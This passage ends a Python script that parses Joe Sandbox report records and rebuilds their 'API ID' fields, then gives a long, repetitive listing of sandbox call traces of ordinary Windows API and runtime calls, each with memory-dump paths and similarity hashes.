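            cur = {"apis": [], "fields": {}}
            records.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(line)):
            args = m.group("args")
            cur["apis"].append({
                "name": m.group("api"), "module": m.group("mod"),
                "args": args.split(",") if args is not None else [],
                "ref": m.group("ref"), "subcall": m.group("sub")})
        elif (m := KV_RE.match(line)):
            # Fields such as 'Associated' repeat, so every value is a list.
            cur["fields"].setdefault(m.group("key"), []).append(
                RESIDUE_RE.sub("", m.group("val")))
    return records


def string_args(record):
    """Arguments that are neither '?' nor a raw 32-bit value, e.g. DLL names."""
    return [a for c in record["apis"] for a in c["args"]
            if a != "?" and not HEX_RE.fullmatch(a)]


def api_id(record):
    """Rebuild 'API ID': tokens of every call (subcalls included) minus STOP,
    grouped by occurrence count (highest first, '$'-joined), each group sorted
    by code point, which is why '_free' lands after the capitalised words."""
    counts = Counter(tok for c in record["apis"]
                     for tok in TOKEN_RE.findall(c["name"]) if tok not in STOP)
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def check_api_ids(records):
    """(reported, reconstructed, match) for each record that carries an API ID."""
    return [(r["fields"]["API ID"][0], api_id(r), r["fields"]["API ID"][0] == api_id(r))
            for r in records if "API ID" in r["fields"]]


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        calls = ", ".join(f'{c["name"]}.{c["module"]}@{c["ref"]}' for c in rec["apis"])
        print(calls, "| strings:", string_args(rec), "| API ID:", api_id(rec))
```

Run against the full listing, `string_args` is the quickest way to find the few call traces that carry a literal (here only `Crypt32.dll`), since the report's own `String ID` fields are empty for these records, and `check_api_ids` flags any record whose reported `API ID` the assumed rule does not reproduce, which is where the rule would need revising.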
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                • Instruction ID: e7aa2be948ba05e0b806bb296b2148a53f8da5778b3fbdf0dea396bb006a55f0
                                • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                • Instruction Fuzzy Hash: 9CF08C305007059FDB30DEA8CA41616B7E8EB15320F248A1BE4DAE3680E770E880CB72
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D88FD3,00000001,00000364,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D885EA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 10ce3ecc7b88b9b439d0651f3f402bc75164173568bab6ab99f04aeb6eadf782
                                • Instruction ID: 928918b0b205dcb04756f054980b6a5a9d2b4a5477a9d64e6a6fde9ccaa46abb
                                • Opcode Fuzzy Hash: 10ce3ecc7b88b9b439d0651f3f402bc75164173568bab6ab99f04aeb6eadf782
                                • Instruction Fuzzy Hash: 53F0E9316442226BDB317F26DC05B6B7788DF417B0B988151E818E6581CE20ED016BF4
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D65BDC
                                  • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                APIs
                                • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00D6968F,?,?,?,?,00D91FA1,000000FF), ref: 00D696EB
                                Similarity
                                • API ID: ChangeCloseFindNotification
                                • String ID:
                                • API String ID: 2591292051-0
                                APIs
                                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D6A4F5
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                APIs
                                • SetThreadExecutionState.KERNEL32(00000001), ref: 00D706B1
                                Similarity
                                • API ID: ExecutionStateThread
                                • String ID:
                                • API String ID: 2211380416-0
                                APIs
                                • GdipAlloc.GDIPLUS(00000010), ref: 00D79D81
                                  • Part of subcall function 00D79B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D79B30
                                Similarity
                                • API ID: Gdip$AllocBitmapCreateFromStream
                                • String ID:
                                • API String ID: 1915507550-0
                                APIs
                                • GetFileType.KERNELBASE(000000FF,00D69887), ref: 00D69995
                                Similarity
                                • API ID: FileType
                                • String ID:
                                • API String ID: 3081899298-0
                                APIs
                                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00D7D43F
                                  • Part of subcall function 00D7AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                                  • Part of subcall function 00D7AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                                  • Part of subcall function 00D7AC74: IsDialogMessageW.USER32(0001042C,?), ref: 00D7ACAA
                                  • Part of subcall function 00D7AC74: TranslateMessage.USER32(?), ref: 00D7ACB8
                                  • Part of subcall function 00D7AC74: DispatchMessageW.USER32(?), ref: 00D7ACC2
                                Similarity
                                • API ID: Message$DialogDispatchItemPeekSendTranslate
                                • String ID:
                                • API String ID: 897784432-0
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 3f2d0fb9711d414725142abe6fc6fc5930a981a6ae6c3e2fbd51e10e1cc167d5
                                • Instruction ID: b96fd5a7f21dfa1979fd2f99a04b456529428e819934c253f74d15c9578c5aac
                                • Opcode Fuzzy Hash: 3f2d0fb9711d414725142abe6fc6fc5930a981a6ae6c3e2fbd51e10e1cc167d5
                                • Instruction Fuzzy Hash: 07B0929526C3026C260821406952D3B1629CC80B20321852EB04EA0180A4409C488432
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: eb6409b9d2c68d991b6ee8d991fa645f27f6131135510094cc9c89479ae6a02f
                                • Instruction ID: 1aa383e5ba1583b737f6d686500e1192c5f2bc71b158ffc437c744dae50fd8df
                                • Opcode Fuzzy Hash: eb6409b9d2c68d991b6ee8d991fa645f27f6131135510094cc9c89479ae6a02f
                                • Instruction Fuzzy Hash: 8DB0129126C2026C320875047D03E36162DCCC1B20330C02FF44FD13C0F4409C0D4432
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 63918c3bd8acddcb8cec0eb48d184d76853c9b3a1261ecf16f3517ee4aca986d
                                • Instruction ID: ed04698555ac8498363a9f36f00b6475b9730dcf226ca70eb29901dcf4e718dc
                                • Opcode Fuzzy Hash: 63918c3bd8acddcb8cec0eb48d184d76853c9b3a1261ecf16f3517ee4aca986d
                                • Instruction Fuzzy Hash: 79B012D526C2026C320871447D43E3B162DDCC0B20330C01FF04FD12C0F8409C084532
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: a0fcdc4a00daa29cd72322474a8158eefd96676871ed02236011024222746058
                                • Instruction ID: 5dbc42b1651a11e6094f917cce065cd6688fbb72237c0aacbb0f3dbbc3b22480
                                • Opcode Fuzzy Hash: a0fcdc4a00daa29cd72322474a8158eefd96676871ed02236011024222746058
                                • Instruction Fuzzy Hash: 62B012E126C1026C320D71057E03E3616BDCCC0B20330C01FF04FD12C0F4809C094432
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 7e1abbff093cfe63799c5e4351ac1e56b69087ca541d739879e9570221146738
                                • Instruction ID: 648a6bee2e9b95081b5a03cb6fa027a41c7734b59f722e6b19be2b353195a887
                                • Opcode Fuzzy Hash: 7e1abbff093cfe63799c5e4351ac1e56b69087ca541d739879e9570221146738
                                • Instruction Fuzzy Hash: E1B012A126D6026C324872047D03E36162FCCC0B20331C11FF04FD12C0F440DC484432
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 386bc4ebab6fb8b22d129ace31fa979e3def5666945df5506ada3c0b1fe65056
                                • Instruction ID: 8d776ac90ff0905748a87bfc75feb013670f7c19dc6288f3508f7098a24ab319
                                • Opcode Fuzzy Hash: 386bc4ebab6fb8b22d129ace31fa979e3def5666945df5506ada3c0b1fe65056
                                • Instruction Fuzzy Hash: 20B012912AD6026C320871047D03E36162FCCC1B20330C01FF44FD12C0F4409C084432
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 094a949b57e6f6a48b76f49e1d38594f444a5bef3f3e8e4b1cefe4525b525101
                                • Instruction ID: 9838c794a9f57ae96aca407e6f504d79c79cdb00d7d181d130788accd0cc9a3d
                                • Opcode Fuzzy Hash: 094a949b57e6f6a48b76f49e1d38594f444a5bef3f3e8e4b1cefe4525b525101
                                • Instruction Fuzzy Hash: BBB0129127D9026C320871047D03E36166FCCC0B20330C01FF04FD12C0F8409C084432
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 19f371445fa7af67776b83f9fa7a930dccd65d4fb339fd6d11916efaa75a9405
                                • Instruction ID: 3fd5b8ec4894a76c71e7afb97dad15f6bd798fe83a0568a2a7fde65c2e4fb5f3
                                • Opcode Fuzzy Hash: 19f371445fa7af67776b83f9fa7a930dccd65d4fb339fd6d11916efaa75a9405
                                • Instruction Fuzzy Hash: CEB0129126C2026C320971147D03E36167DCCC1B20331C01FF54FD12C0F5409C084432
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 7c886185af3054a701187734c85f1f1b6565063f35082e78b00c182790c3cd28
                                • Instruction ID: 425e4f52d10ea182e07de1c16309ecb5b4fa23cb50dce7c9309f15b5f80057fb
                                • Opcode Fuzzy Hash: 7c886185af3054a701187734c85f1f1b6565063f35082e78b00c182790c3cd28
                                • Instruction Fuzzy Hash: 6FB0129126C0026C320871057E03F3E126EDDC4B20330C52FF00FC1144F8448C0D5431
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: b083ec4f12306f5974e2c864345421def94e665dedb3543094808163fc9f0b79
                                • Instruction ID: 791791de184434ea9fc46c0c34d5796cfc70be29561b95e828bb9700e74d8e60
                                • Opcode Fuzzy Hash: b083ec4f12306f5974e2c864345421def94e665dedb3543094808163fc9f0b79
                                • Instruction Fuzzy Hash: 95B012A226C102AC32087105BE03E3A126DCDC0B20330C11FF44FC1144F4488C085431
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 8efff3ed2d4f003ee1f50bef55acf193d211a6814773999ab49709c3cd15d865
                                • Instruction ID: b5fa89fa7e3a18d9eb34c023e6a550f154ff33004e222bedece224773f1b39ea
                                • Opcode Fuzzy Hash: 8efff3ed2d4f003ee1f50bef55acf193d211a6814773999ab49709c3cd15d865
                                • Instruction Fuzzy Hash: 3DB0929526C0026D220861142907E36223ED880B20321802FB00EC1140A9408C099031
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
